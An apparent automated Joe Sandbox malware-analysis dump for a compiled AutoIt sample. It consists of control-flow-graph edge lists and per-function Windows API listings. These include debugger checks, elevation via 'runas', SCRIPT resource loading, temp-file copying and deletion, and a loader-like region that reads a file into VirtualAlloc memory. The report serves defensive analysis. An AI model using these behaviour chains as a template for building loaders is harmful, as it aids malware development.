98217 3786d2 98215->98217 98218 370c5d __close_nolock 61 API calls 98216->98218 98219 370fdb 70 API calls __read_nolock 98216->98219 98220 379922 __chsize_nolock 82 API calls 98216->98220 98216->98222 98225 378541 98216->98225 98228 37852a 98216->98228 98230 371a41 60 API calls __lseeki64_nolock 98216->98230 98221 36d5bd __free_osfhnd 59 API calls 98217->98221 98218->98216 98219->98216 98220->98216 98221->98223 98222->98206 98222->98216 98224 36da06 __write 78 API calls 98222->98224 98226 371a41 60 API calls __lseeki64_nolock 98222->98226 98223->98159 98224->98222 98227 370c5d __close_nolock 61 API calls 98225->98227 98226->98222 98229 378548 98227->98229 98228->98206 98231 368ca8 __filbuf 58 API calls 98229->98231 98230->98216 98231->98223 98232->98149 98233->98155 98234->98155 98236 344ce1 98235->98236 98237 344d9d LoadLibraryA 98235->98237 98236->98035 98236->98038 98237->98236 98238 344dae GetProcAddress 98237->98238 98238->98236 98240 360f36 Mailbox 59 API calls 98239->98240 98241 3453a0 98240->98241 98241->98043 98243 345003 FindResourceExW 98242->98243 98244 345020 98242->98244 98243->98244 98245 37dc8c LoadResource 98243->98245 98244->98044 98245->98244 98246 37dca1 SizeofResource 98245->98246 98246->98244 98247 37dcb5 LockResource 98246->98247 98247->98244 98249 345054 98248->98249 98250 37dd04 98248->98250 98254 3659bd 98249->98254 98252 345062 98252->98054 98253->98044 98257 3659c9 __getstream 98254->98257 98255 3659db 98267 368ca8 58 API calls __getptd_noexit 98255->98267 98257->98255 98258 365a01 98257->98258 98269 366d8e 98258->98269 98260 3659e0 98268 368f36 9 API calls __filbuf 98260->98268 98261 365a07 98275 36592e 83 API calls 4 library calls 98261->98275 98264 365a16 98276 365a38 LeaveCriticalSection LeaveCriticalSection _fprintf 98264->98276 98266 3659eb __getstream 98266->98252 98267->98260 98268->98266 98270 366dc0 EnterCriticalSection 98269->98270 98271 366d9e 98269->98271 98273 366db6 98270->98273 98271->98270 98272 366da6 98271->98272 98274 
369d8b __lock 58 API calls 98272->98274 98273->98261 98274->98273 98275->98264 98276->98266 98280 36576d 98277->98280 98279 34508e 98279->98063 98281 365779 __getstream 98280->98281 98282 36578f _memset 98281->98282 98283 3657bc 98281->98283 98284 3657b4 __getstream 98281->98284 98293 368ca8 58 API calls __getptd_noexit 98282->98293 98285 366d8e __lock_file 59 API calls 98283->98285 98284->98279 98287 3657c2 98285->98287 98295 36558d 72 API calls 4 library calls 98287->98295 98289 3657a9 98294 368f36 9 API calls __filbuf 98289->98294 98290 3657d8 98296 3657f6 LeaveCriticalSection LeaveCriticalSection _fprintf 98290->98296 98293->98289 98294->98284 98295->98290 98296->98284 98300 36537a GetSystemTimeAsFileTime 98297->98300 98299 3a9017 98299->98065 98301 3653a8 __aulldiv 98300->98301 98301->98299 98303 365ddc __getstream 98302->98303 98304 365e03 98303->98304 98305 365dee 98303->98305 98306 366d8e __lock_file 59 API calls 98304->98306 98316 368ca8 58 API calls __getptd_noexit 98305->98316 98308 365e09 98306->98308 98318 365a40 67 API calls 5 library calls 98308->98318 98309 365df3 98317 368f36 9 API calls __filbuf 98309->98317 98312 365e14 98319 365e34 LeaveCriticalSection LeaveCriticalSection _fprintf 98312->98319 98314 365e26 98315 365dfe __getstream 98314->98315 98315->98070 98316->98309 98317->98315 98318->98312 98319->98314 98320->97935 98321->97948 98322->97950 98323->97947 98324->97956 98326 3492c9 Mailbox 98325->98326 98327 37f4f8 98326->98327 98332 3492d3 98326->98332 98328 360f36 Mailbox 59 API calls 98327->98328 98330 37f504 98328->98330 98329 3492da 98329->97960 98332->98329 98333 349df0 59 API calls Mailbox 98332->98333 98333->98332 98334->97971 98335->97970 98340 3a97f1 __tzset_nolock _wcscmp 98336->98340 98337 3a9685 98337->97977 98337->98004 98338 34506b 74 API calls 98338->98340 98339 3a91b2 GetSystemTimeAsFileTime 98339->98340 98340->98337 98340->98338 98340->98339 98341 345045 85 API calls 98340->98341 98341->98340 98342->98003 98344 365522 
__getstream 98343->98344 98345 365536 98344->98345 98346 36554e 98344->98346 98372 368ca8 58 API calls __getptd_noexit 98345->98372 98348 366d8e __lock_file 59 API calls 98346->98348 98352 365546 __getstream 98346->98352 98350 365560 98348->98350 98349 36553b 98373 368f36 9 API calls __filbuf 98349->98373 98356 3654aa 98350->98356 98352->98009 98357 3654cd 98356->98357 98358 3654b9 98356->98358 98370 3654c9 98357->98370 98375 364bad 98357->98375 98418 368ca8 58 API calls __getptd_noexit 98358->98418 98361 3654be 98419 368f36 9 API calls __filbuf 98361->98419 98367 3654e7 98392 370b82 98367->98392 98369 3654ed 98369->98370 98371 362ed5 _free 58 API calls 98369->98371 98374 365585 LeaveCriticalSection LeaveCriticalSection _fprintf 98370->98374 98371->98370 98372->98349 98373->98352 98374->98352 98376 364bc0 98375->98376 98380 364be4 98375->98380 98377 364856 __filbuf 58 API calls 98376->98377 98376->98380 98378 364bdd 98377->98378 98420 36da06 98378->98420 98381 370cf7 98380->98381 98382 3654e1 98381->98382 98383 370d04 98381->98383 98385 364856 98382->98385 98383->98382 98384 362ed5 _free 58 API calls 98383->98384 98384->98382 98386 364875 98385->98386 98387 364860 98385->98387 98386->98367 98555 368ca8 58 API calls __getptd_noexit 98387->98555 98389 364865 98556 368f36 9 API calls __filbuf 98389->98556 98391 364870 98391->98367 98393 370b8e __getstream 98392->98393 98394 370bb2 98393->98394 98395 370b9b 98393->98395 98397 370c3d 98394->98397 98399 370bc2 98394->98399 98572 368c74 58 API calls __getptd_noexit 98395->98572 98577 368c74 58 API calls __getptd_noexit 98397->98577 98398 370ba0 98573 368ca8 58 API calls __getptd_noexit 98398->98573 98402 370be0 98399->98402 98403 370bea 98399->98403 98574 368c74 58 API calls __getptd_noexit 98402->98574 98406 36d386 ___lock_fhandle 59 API calls 98403->98406 98404 370be5 98578 368ca8 58 API calls __getptd_noexit 98404->98578 98408 370bf0 98406->98408 98410 370c03 98408->98410 98411 370c0e 98408->98411 98409 370c49 98579 
368f36 9 API calls __filbuf 98409->98579 98557 370c5d 98410->98557 98575 368ca8 58 API calls __getptd_noexit 98411->98575 98412 370ba7 __getstream 98412->98369 98416 370c09 98576 370c35 LeaveCriticalSection __unlock_fhandle 98416->98576 98418->98361 98419->98370 98421 36da12 __getstream 98420->98421 98422 36da36 98421->98422 98423 36da1f 98421->98423 98424 36dad5 98422->98424 98427 36da4a 98422->98427 98521 368c74 58 API calls __getptd_noexit 98423->98521 98527 368c74 58 API calls __getptd_noexit 98424->98527 98426 36da24 98522 368ca8 58 API calls __getptd_noexit 98426->98522 98430 36da72 98427->98430 98431 36da68 98427->98431 98448 36d386 98430->98448 98523 368c74 58 API calls __getptd_noexit 98431->98523 98432 36da6d 98528 368ca8 58 API calls __getptd_noexit 98432->98528 98435 36da78 98437 36da9e 98435->98437 98438 36da8b 98435->98438 98524 368ca8 58 API calls __getptd_noexit 98437->98524 98457 36daf5 98438->98457 98439 36dae1 98529 368f36 9 API calls __filbuf 98439->98529 98441 36da2b __getstream 98441->98380 98444 36daa3 98525 368c74 58 API calls __getptd_noexit 98444->98525 98445 36da97 98526 36dacd LeaveCriticalSection __unlock_fhandle 98445->98526 98449 36d392 __getstream 98448->98449 98450 36d3e1 EnterCriticalSection 98449->98450 98451 369d8b __lock 58 API calls 98449->98451 98452 36d407 __getstream 98450->98452 98453 36d3b7 98451->98453 98452->98435 98454 36d3cf 98453->98454 98530 369fab InitializeCriticalSectionAndSpinCount 98453->98530 98531 36d40b LeaveCriticalSection _doexit 98454->98531 98458 36db02 __write_nolock 98457->98458 98459 36db60 98458->98459 98460 36db41 98458->98460 98488 36db36 98458->98488 98463 36dbb8 98459->98463 98464 36db9c 98459->98464 98541 368c74 58 API calls __getptd_noexit 98460->98541 98461 36c776 __call_reportfault 6 API calls 98465 36e356 98461->98465 98468 36dbd1 98463->98468 98547 371a41 60 API calls 3 library calls 98463->98547 98544 368c74 58 API calls __getptd_noexit 98464->98544 98465->98445 98466 36db46 98542 368ca8 58 
[Control-flow graph rendering spilled into the text as node-id edge pairs; the graph itself is not recoverable. What the edge labels preserve: the function nodes in the 0x0034xxxx-0x003Bxxxx image (the AutoIt interpreter and its CRT, with helpers such as __getptd_noexit, __filbuf, _memmove and the "Mailbox" routine) cover console and file output (WriteFile, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteConsoleW), path and directory handling (GetFullPathNameW, GetLongPathNameW, SetCurrentDirectoryW, GetFileAttributesW, FindFirstFileW/FindClose, CharLowerBuffW), temp-file staging (GetTempPathW, GetTempFileNameW, CopyFileW, SetFileTime, DeleteFileW), registry reads (RegOpenKeyExW, RegQueryValueExW, RegCloseKey), a self-terminate path (GetCurrentProcess, TerminateProcess) and the tray/window message loop (SetTimer, RegisterWindowMessageW, CreatePopupMenu, Shell_NotifyIconW, DefWindowProcW, PostQuitMessage). A separate code region at 0x024E0000, outside the image, resolves the PEB (GetPEB), calls Sleep, then CreateFileW, VirtualAlloc and ReadFile before a routine with 13 further API calls and ExitProcess, i.e. a loader stage that reads a file into freshly allocated memory.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B7A
• IsDebuggerPresent.KERNEL32 ref: 00343B8C
• GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BFD
  • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
  • Part of subcall function 00350A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C26,004052F8,?,?,?), ref: 00350ACE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00343C81
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F7770,00000010), ref: 0037D3EC
• SetCurrentDirectoryW.KERNEL32(?,004052F8,?,?,?), ref: 0037D424
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003F4260,004052F8,?,?,?), ref: 0037D4AA
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0037D4B1
  • Part of subcall function 00343A58: GetSysColorBrush.USER32(0000000F), ref: 00343A62
  • Part of subcall function 00343A58: LoadCursorW.USER32(00000000,00007F00), ref: 00343A71
  • Part of subcall function 00343A58: LoadIconW.USER32(00000063), ref: 00343A88
  • Part of subcall function 00343A58: LoadIconW.USER32(000000A4), ref: 00343A9A
  • Part of subcall function 00343A58: LoadIconW.USER32(000000A2), ref: 00343AAC
  • Part of subcall function 00343A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AD2
  • Part of subcall function 00343A58: RegisterClassExW.USER32(?), ref: 00343B28
  • Part of subcall function 003439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A15
  • Part of subcall function 003439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A36
  • Part of subcall function 003439E7: ShowWindow.USER32(00000000,?,?), ref: 00343A4A
  • Part of subcall function 003439E7: ShowWindow.USER32(00000000,?,?), ref: 00343A53
  • Part of subcall function 003443DB: _memset.LIBCMT ref: 00344401
  • Part of subcall function 003443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003444A6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%=
                                                          • API String ID: 529118366-4029254884
                                                          • Opcode ID: 4a26b77e583a7036c229502b1b3f90ef99d7eec1fae3995ace65b0d004728fa8
                                                          • Instruction ID: a3bdb420a114daa79d2210ecf1a1656c82812b3899798bfc2b35a57748377afd
                                                          • Opcode Fuzzy Hash: 4a26b77e583a7036c229502b1b3f90ef99d7eec1fae3995ace65b0d004728fa8
                                                          • Instruction Fuzzy Hash: 8951BF75908249AECF13ABB4DC45EFE7BB9EF44300F0081B9E851BE1A1DB746A458F25

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00344EEE,?,?,00000000,00000000), ref: 00344FF9
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00344EEE,?,?,00000000,00000000), ref: 00345010
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F), ref: 0037DC90
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F), ref: 0037DCA5
                                                          • LockResource.KERNEL32(N4,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F,00000000), ref: 0037DCB8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT$N4
                                                          • API String ID: 3051347437-3281411753
                                                          • Opcode ID: 3c641b62f84ada2fc8b45ee7cf852e23e8181637bda7aa74394edc94f27cd1c5
                                                          • Instruction ID: aee955afa10800fb91640499cac9e6a9401b6ea2f7b9016fcc1d680638973e90
                                                          • Opcode Fuzzy Hash: 3c641b62f84ada2fc8b45ee7cf852e23e8181637bda7aa74394edc94f27cd1c5
                                                          • Instruction Fuzzy Hash: 8F112E79640701AFD7228B65DC58F677BBEEBC9B51F10456CF405DA250DB61EC008660

                                                          Control-flow Graph

                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00344B2B
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • GetCurrentProcess.KERNEL32(?,003CFAEC,00000000,00000000,?), ref: 00344BF8
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00344BFF
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00344C45
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00344C50
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00344C81
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00344C8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: 179a49b4cced18c7021549c793c6275b6fd593ee61e872a03d384507731ca013
                                                          • Instruction ID: 51807e5814f1237b51d951e96c3b3c5cf7ba45592250e68da56d3b259c18dccf
                                                          • Opcode Fuzzy Hash: 179a49b4cced18c7021549c793c6275b6fd593ee61e872a03d384507731ca013
                                                          • Instruction Fuzzy Hash: F391D63154A7C0DEC733CB6885916AAFFF5AF25300B4989ADD0CB9BB01D224F908D759
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Dd@$Dd@$Dd@$Dd@$Variable must be of type 'Object'.
                                                          • API String ID: 0-2845646731
                                                          • Opcode ID: b8ae384c267169d1401e51ab197fd2af30e8bb873d220af694dd44c98aa02fce
                                                          • Instruction ID: c27174281d0a38f1f62615605dd927e96f90f3155975c06d6a89c8008a42584d
                                                          • Opcode Fuzzy Hash: b8ae384c267169d1401e51ab197fd2af30e8bb873d220af694dd44c98aa02fce
                                                          • Instruction Fuzzy Hash: 85A27874A04215CFCB26DF58C480AAAB7F5FF58304F2A8569E906AF351D775BD82CB80
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,0037E6F1), ref: 003A44AB
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 003A44BC
                                                          • FindClose.KERNEL32(00000000), ref: 003A44CC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                          • Instruction ID: 2da4b07eeccecd2252f366870e4614515e26de1c0a88a8156f4a565de6a1075d
                                                          • Opcode Fuzzy Hash: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                          • Instruction Fuzzy Hash: 0AE020358104006F9611A738EC0DCE9775DEE4A335F104B15F935C10D0E7B46D1087D5
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350BBB
                                                          • timeGetTime.WINMM ref: 00350E76
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350FB3
                                                          • Sleep.KERNEL32(0000000A), ref: 00350FC1
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 0035105A
                                                          • DestroyWindow.USER32 ref: 00351066
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00351080
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003851DC
                                                          • TranslateMessage.USER32(?), ref: 00385FB9
                                                          • DispatchMessageW.USER32(?), ref: 00385FC7
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00385FDB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb@$pb@$pb@$pb@
                                                          • API String ID: 4212290369-4030950617
                                                          • Opcode ID: 1e7b91ae8a1fb9d84c42458bb64ad2585985846c8adb1fd58792aa482b9e851f
                                                          • Instruction ID: fb5ae2492d36e8d851f3d6dd567bb9131013ed23e494d4c049864a7ef6165e2b
                                                          • Opcode Fuzzy Hash: 1e7b91ae8a1fb9d84c42458bb64ad2585985846c8adb1fd58792aa482b9e851f
                                                          • Instruction Fuzzy Hash: DDB2D570608741DFD72ADF24C885FAAB7E5BF84304F15495DE88A9B2A1D771E848CB82

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003A9008: __time64.LIBCMT ref: 003A9012
                                                            • Part of subcall function 00345045: _fseek.LIBCMT ref: 0034505D
                                                          • __wsplitpath.LIBCMT ref: 003A92DD
                                                            • Part of subcall function 0036426E: __wsplitpath_helper.LIBCMT ref: 003642AE
                                                          • _wcscpy.LIBCMT ref: 003A92F0
                                                          • _wcscat.LIBCMT ref: 003A9303
                                                          • __wsplitpath.LIBCMT ref: 003A9328
                                                          • _wcscat.LIBCMT ref: 003A933E
                                                          • _wcscat.LIBCMT ref: 003A9351
                                                            • Part of subcall function 003A904E: _memmove.LIBCMT ref: 003A9087
                                                            • Part of subcall function 003A904E: _memmove.LIBCMT ref: 003A9096
                                                          • _wcscmp.LIBCMT ref: 003A9298
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98CD
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98E0
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A94FB
                                                          • _wcsncpy.LIBCMT ref: 003A956E
                                                          • DeleteFileW.KERNEL32(?,?), ref: 003A95A4
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A95BA
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A95CB
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A95DD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 67b01302743c10a2aede3240a7624ffd23a2ea0b438124badf2813f46b5909da
                                                          • Instruction ID: 966e68704ef3f7ab7dd0aad62a7931eb146400f7673f335cdcc7fd1d730d1b3c
                                                          • Opcode Fuzzy Hash: 67b01302743c10a2aede3240a7624ffd23a2ea0b438124badf2813f46b5909da
                                                          • Instruction Fuzzy Hash: 28C12BB5D00219ABCF22DF95CC85EDEBBBDEF45310F0040AAF609EA151DB709A448F65

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                          • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                          • LoadIconW.USER32(000000A9), ref: 003430F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 2738926f324b65414a2fff399fd7bafd7e23d53f19daa300c11f1cc46811df1e
                                                          • Instruction ID: b5f68727ae32ccacb3319ed14c457dc15ec9827ccda78aec469d3d3f416cbd94
                                                          • Opcode Fuzzy Hash: 2738926f324b65414a2fff399fd7bafd7e23d53f19daa300c11f1cc46811df1e
                                                          • Instruction Fuzzy Hash: 813148B2800309AFDB419FA4D888ADEBBF5FB09310F10812AE980E62A0D3B51550CF55

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                          • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                          • LoadIconW.USER32(000000A9), ref: 003430F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                                          • Instruction ID: 6786a2aae98f86858b020351409db048cba1b9126dc7bc679877eb2932daf379
                                                          • Opcode Fuzzy Hash: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
